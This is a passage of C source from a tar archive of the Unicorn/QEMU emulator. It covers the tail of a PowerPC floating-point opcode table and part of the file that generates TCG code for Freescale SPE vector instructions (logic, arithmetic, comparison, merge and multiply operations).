0x00, 0, PPC_FLOAT), GEN_HANDLER_E(fctiwuz, 0x3F, 0x0F, 0x04, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(rsp, 0x0C, 0x00, 1, PPC_FLOAT), GEN_HANDLER_E(fcfid, 0x3F, 0x0E, 0x1A, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fcfids, 0x3B, 0x0E, 0x1A, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fcfidu, 0x3F, 0x0E, 0x1E, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fcfidus, 0x3B, 0x0E, 0x1E, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fctid, 0x3F, 0x0E, 0x19, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fctidu, 0x3F, 0x0E, 0x1D, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fctidz, 0x3F, 0x0F, 0x19, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fctiduz, 0x3F, 0x0F, 0x1D, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(rin, 0x08, 0x0C, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(riz, 0x08, 0x0D, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(rip, 0x08, 0x0E, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(rim, 0x08, 0x0F, 1, PPC_FLOAT_EXT), #define GEN_LDF(name, ldop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUF(name, ldop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUXF(name, ldop, opc, type) \ GEN_HANDLER(name##ux, 0x1F, 0x17, opc, 0x00000001, type), #define GEN_LDXF(name, ldop, opc2, opc3, type) \ GEN_HANDLER(name##x, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_LDFS(name, ldop, op, type) \ GEN_LDF(name, ldop, op | 0x20, type) \ GEN_LDUF(name, ldop, op | 0x21, type) \ GEN_LDUXF(name, ldop, op | 0x01, type) \ GEN_LDXF(name, ldop, 0x17, op | 0x00, type) GEN_LDFS(lfd, ld64, 0x12, PPC_FLOAT) GEN_LDFS(lfs, ld32fs, 0x10, PPC_FLOAT) GEN_HANDLER_E(lfdepx, 0x1F, 0x1F, 0x12, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(lfiwax, 0x1f, 0x17, 0x1a, 0x00000001, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(lfiwzx, 0x1f, 0x17, 0x1b, 0x1, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(lfdpx, 0x1F, 0x17, 0x18, 0x00200001, PPC_NONE, PPC2_ISA205), #define GEN_STF(name, stop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUF(name, stop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUXF(name, stop, opc, type) \ GEN_HANDLER(name##ux, 0x1F, 0x17, opc, 0x00000001, type), #define GEN_STXF(name, stop, opc2, opc3, type) \ GEN_HANDLER(name##x, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_STFS(name, stop, op, type) \ GEN_STF(name, stop, op | 0x20, type) \ GEN_STUF(name, stop, op | 0x21, type) \ GEN_STUXF(name, stop, op | 0x01, type) \ GEN_STXF(name, stop, 0x17, op | 0x00, type) GEN_STFS(stfd, st64_i64, 0x16, PPC_FLOAT) GEN_STFS(stfs, st32fs, 0x14, PPC_FLOAT) GEN_STXF(stfiw, st32fiw, 0x17, 0x1E, PPC_FLOAT_STFIWX) GEN_HANDLER_E(stfdepx, 0x1F, 0x1F, 0x16, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(stfdpx, 0x1F, 0x17, 0x1C, 0x00200001, PPC_NONE, PPC2_ISA205), GEN_HANDLER(frsqrtes, 0x3B, 0x1A, 0xFF, 0x001F07C0, PPC_FLOAT_FRSQRTES), GEN_HANDLER(fsqrt, 0x3F, 0x16, 0xFF, 0x001F07C0, PPC_FLOAT_FSQRT), GEN_HANDLER(fsqrts, 0x3B, 0x16, 0xFF, 0x001F07C0, PPC_FLOAT_FSQRT), GEN_HANDLER(fcmpo, 0x3F, 0x00, 0x01, 0x00600001, PPC_FLOAT), GEN_HANDLER(fcmpu, 0x3F, 0x00, 0x00, 0x00600001, PPC_FLOAT), GEN_HANDLER(fabs, 0x3F, 0x08, 0x08, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fmr, 0x3F, 0x08, 0x02, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fnabs, 0x3F, 0x08, 0x04, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fneg, 0x3F, 0x08, 0x01, 0x001F0000, PPC_FLOAT), GEN_HANDLER_E(fcpsgn, 0x3F, 0x08, 0x00, 0x00000000, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(fmrgew, 0x3F, 0x06, 0x1E, 0x00000001, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(fmrgow, 0x3F, 0x06, 0x1A, 0x00000001, PPC_NONE, PPC2_VSX207), GEN_HANDLER(mcrfs, 0x3F, 0x00, 0x02, 0x0063F801, PPC_FLOAT), GEN_HANDLER_E_2(mffs, 0x3F, 0x07, 0x12, 0x00, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER_E_2(mffsce, 0x3F, 0x07, 0x12, 0x01, 0x00000000, PPC_FLOAT, PPC2_ISA300), GEN_HANDLER_E_2(mffsl, 0x3F, 0x07, 0x12, 0x18, 0x00000000, PPC_FLOAT, PPC2_ISA300), GEN_HANDLER_E_2(mffscrn, 0x3F, 0x07, 0x12, 0x16, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER_E_2(mffscrni, 0x3F, 0x07, 0x12, 0x17, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER(mtfsb0, 0x3F, 0x06, 0x02, 0x001FF800, PPC_FLOAT), GEN_HANDLER(mtfsb1, 0x3F, 0x06, 0x01, 0x001FF800, PPC_FLOAT), GEN_HANDLER(mtfsf, 0x3F, 0x07, 0x16, 0x00000000, PPC_FLOAT), GEN_HANDLER(mtfsfi, 0x3F, 0x06, 0x04, 0x006e0800, PPC_FLOAT), �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/spe-impl.inc.c����������������������������������������������0000664�0000000�0000000�00000166517�14675241067�0022702�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * translate-spe.c * * Freescale SPE extension translation */ /*** SPE extension ***/ /* Register moves */ static inline void gen_evmra(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rA_lo + rA_hi << 32 */ tcg_gen_concat_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); /* spe_acc := tmp */ tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, tmp); /* rD := rA */ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } static inline void gen_load_gpr64(TCGContext *tcg_ctx, TCGv_i64 t, int reg) { tcg_gen_concat_tl_i64(tcg_ctx, t, cpu_gpr[reg], cpu_gprh[reg]); } static inline void gen_store_gpr64(TCGContext *tcg_ctx, int reg, TCGv_i64 t) { tcg_gen_extr_i64_tl(tcg_ctx, cpu_gpr[reg], cpu_gprh[reg], t); } #define GEN_SPE(name0, name1, opc2, opc3, inval0, inval1, type) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if (Rc(ctx->opcode)) \ gen_##name1(ctx); \ else \ gen_##name0(ctx); \ } /* Handler for undefined SPE opcodes */ static inline void gen_speundef(DisasContext *ctx) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* SPE logic */ #define GEN_SPEOP_LOGIC2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ tcg_op(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], \ cpu_gprh[rB(ctx->opcode)]); \ } GEN_SPEOP_LOGIC2(evand, tcg_gen_and_tl); GEN_SPEOP_LOGIC2(evandc, tcg_gen_andc_tl); GEN_SPEOP_LOGIC2(evxor, tcg_gen_xor_tl); GEN_SPEOP_LOGIC2(evor, tcg_gen_or_tl); GEN_SPEOP_LOGIC2(evnor, tcg_gen_nor_tl); GEN_SPEOP_LOGIC2(eveqv, tcg_gen_eqv_tl); GEN_SPEOP_LOGIC2(evorc, tcg_gen_orc_tl); GEN_SPEOP_LOGIC2(evnand, tcg_gen_nand_tl); /* SPE logic immediate */ #define GEN_SPEOP_TCG_LOGIC_IMM2(name, tcg_opi) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_opi(tcg_ctx, t0, t0, rB(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_opi(tcg_ctx, t0, t0, rB(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_TCG_LOGIC_IMM2(evslwi, tcg_gen_shli_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evsrwiu, tcg_gen_shri_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evsrwis, tcg_gen_sari_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evrlwi, tcg_gen_rotli_i32); /* SPE arithmetic */ #define GEN_SPEOP_ARITH1(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_ARITH1(evabs, tcg_gen_abs_i32); GEN_SPEOP_ARITH1(evneg, tcg_gen_neg_i32); GEN_SPEOP_ARITH1(evextsb, tcg_gen_ext8s_i32); GEN_SPEOP_ARITH1(evextsh, tcg_gen_ext16s_i32); static inline void gen_op_evrndw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1) { tcg_gen_addi_i32(tcg_ctx, ret, arg1, 0x8000); tcg_gen_ext16u_i32(tcg_ctx, ret, ret); } GEN_SPEOP_ARITH1(evrndw, gen_op_evrndw); GEN_SPEOP_ARITH1(evcntlsw, gen_helper_cntlsw32); GEN_SPEOP_ARITH1(evcntlzw, gen_helper_cntlzw32); #define GEN_SPEOP_ARITH2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gprh[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } static inline void gen_op_evsrwu(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_shr_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evsrwu, gen_op_evsrwu); static inline void gen_op_evsrws(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_sar_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evsrws, gen_op_evsrws); static inline void gen_op_evslw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_shl_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evslw, gen_op_evslw); static inline void gen_op_evrlw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x1F); tcg_gen_rotl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evrlw, gen_op_evrlw); static inline void gen_evmergehi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } GEN_SPEOP_ARITH2(evaddw, tcg_gen_add_i32); static inline void gen_op_evsubf(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_sub_i32(tcg_ctx, ret, arg2, arg1); } GEN_SPEOP_ARITH2(evsubfw, gen_op_evsubf); /* SPE arithmetic immediate */ #define GEN_SPEOP_ARITH_IMM2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, rA(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, rA(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_ARITH_IMM2(evaddiw, tcg_gen_addi_i32); GEN_SPEOP_ARITH_IMM2(evsubifw, tcg_gen_subi_i32); /* SPE comparison */ #define GEN_SPEOP_COMP(name, tcg_cond) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ TCGLabel *l1 = gen_new_label(tcg_ctx); \ TCGLabel *l2 = gen_new_label(tcg_ctx); \ TCGLabel *l3 = gen_new_label(tcg_ctx); \ TCGLabel *l4 = gen_new_label(tcg_ctx); \ \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gprh[rA(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gprh[rB(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); \ \ tcg_gen_brcond_tl(tcg_ctx, tcg_cond, cpu_gpr[rA(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)], l1); \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], 0); \ tcg_gen_br(tcg_ctx, l2); \ gen_set_label(tcg_ctx, l1); \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ CRF_CL | CRF_CH_OR_CL | CRF_CH_AND_CL); \ gen_set_label(tcg_ctx, l2); \ tcg_gen_brcond_tl(tcg_ctx, tcg_cond, cpu_gprh[rA(ctx->opcode)], \ cpu_gprh[rB(ctx->opcode)], l3); \ tcg_gen_andi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], \ ~(CRF_CH | CRF_CH_AND_CL)); \ tcg_gen_br(tcg_ctx, l4); \ gen_set_label(tcg_ctx, l3); \ tcg_gen_ori_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], \ CRF_CH | CRF_CH_OR_CL); \ gen_set_label(tcg_ctx, l4); \ } GEN_SPEOP_COMP(evcmpgtu, TCG_COND_GTU); GEN_SPEOP_COMP(evcmpgts, TCG_COND_GT); GEN_SPEOP_COMP(evcmpltu, TCG_COND_LTU); GEN_SPEOP_COMP(evcmplts, TCG_COND_LT); GEN_SPEOP_COMP(evcmpeq, TCG_COND_EQ); /* SPE misc */ static inline void gen_brinc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Note: brinc is usable even if SPE is disabled */ gen_helper_brinc(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } static inline void gen_evmergelo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } static inline void gen_evmergehilo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } static inline void gen_evmergelohi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } if (rD(ctx->opcode) == rA(ctx->opcode)) { TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], tmp); tcg_temp_free(tcg_ctx, tmp); } else { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); } } static inline void gen_evsplati(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint64_t imm = ((int32_t)(rA(ctx->opcode) << 27)) >> 27; tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], imm); tcg_gen_movi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], imm); } static inline void gen_evsplatfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint64_t imm = rA(ctx->opcode) << 27; tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], imm); tcg_gen_movi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], imm); } static inline void gen_evsel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); TCGLabel *l4 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, cpu_crf[ctx->opcode & 0x07], 1 << 3); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t0, 0, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); gen_set_label(tcg_ctx, l2); tcg_gen_andi_i32(tcg_ctx, t0, cpu_crf[ctx->opcode & 0x07], 1 << 2); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t0, 0, l3); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l4); gen_set_label(tcg_ctx, l3); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); gen_set_label(tcg_ctx, l4); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_evsel0(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel1(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel2(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel3(DisasContext *ctx) { gen_evsel(ctx); } /* Multiply */ static inline void gen_evmwumi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, t1; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); /* t0 := rA; t1 := rB */ tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, t0, t0); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); /* t0 := rA * rB */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); /* rD := t0 */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_evmwumia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 tmp; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } gen_evmwumi(ctx); /* rD := rA * rB */ tmp = tcg_temp_new_i64(tcg_ctx); /* acc := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwumiaa(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 acc; TCGv_i64 tmp; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } gen_evmwumi(ctx); /* rD := rA * rB */ acc = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); /* Load acc */ tcg_gen_ld_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* acc := tmp + acc */ tcg_gen_add_i64(tcg_ctx, acc, acc, tmp); /* Store acc */ tcg_gen_st_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* rD := acc */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), acc); tcg_temp_free_i64(tcg_ctx, acc); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwsmi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, t1; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); /* t0 := rA; t1 := rB */ tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); /* t0 := rA * rB */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); /* rD := t0 */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_evmwsmia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 tmp; gen_evmwsmi(ctx); /* rD := rA * rB */ tmp = tcg_temp_new_i64(tcg_ctx); /* acc := rD */ 